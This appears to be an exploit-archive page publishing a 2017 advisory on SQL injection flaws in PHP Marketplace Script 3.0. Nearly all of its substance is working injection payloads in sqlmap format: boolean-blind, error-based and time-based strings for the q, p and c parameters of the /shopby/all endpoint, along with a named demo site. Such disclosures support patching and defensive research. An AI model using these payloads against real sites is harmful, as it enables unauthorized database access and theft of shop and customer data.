PHP Marketplace Script SQL Injection

PHP Marketplace Script SQL Injection: Posted Feb 14, 2017; Authored by Yunus YILDIRIM; PHP Marketplace Script suffers from a remote SQL injection vulnerability.; tags | exploit, remote, php, sql injection; SHA-256 | ac055451974d9175778f92f634ca4b8ba3b18268c395dd4273a1234943e7765d; Download | Favorite | View

PHP Marketplace Script SQL Injection

# Exploit Title :  PHP Marketplace Script - Multiple SQL Injection Vulnerabilities
# Author        :  Yunus YILDIRIM (Th3GundY)
# Team          :  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website       :  http://www.yunus.ninja
# Contact       :  yunusyildirim@protonmail.com
 
# Vendor Homepage   : http://www.ecommercemix.com/
# Software Link     : http://ecommercemix.com/php-marketplace-script/
# Vuln. Version     : 3.0
# Demo              : http://pleasureriver.com
 
 
# # # #  DETAILS  # # # # 
 
SQL Injections :
 
# 1
http://localhost/shopby/all?q=gundy
    Parameter: q (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
        Payload: q=LIEQ") OR NOT 5305=5305#
 
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: q=LIEQ") AND (SELECT 7200 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("SRxl"="SRxl
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind (comment)
        Payload: q=LIEQ") OR SLEEP(5)#
 
# 2
http://localhost/shopby/all?p=31
    Parameter: p (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
        Payload: p=31") OR NOT 6681=6681#
 
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: p=31") AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4760=4760,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("eFds"="eFds
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: p=31") AND SLEEP(5) AND ("kxQU"="kxQU
 
# 3
http://localhost/shopby/all?c=Turkey
    Parameter: c (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: c=Turkey' AND 9145=9145 AND 'tvKB'='tvKB
 
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: c=Turkey' AND (SELECT 5928 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT (ELT(5928=5928,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'APFD'='APFD
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

PHP Marketplace Script SQL Injection

PHP Marketplace Script SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP Marketplace Script SQL Injection

Share This

PHP Marketplace Script SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems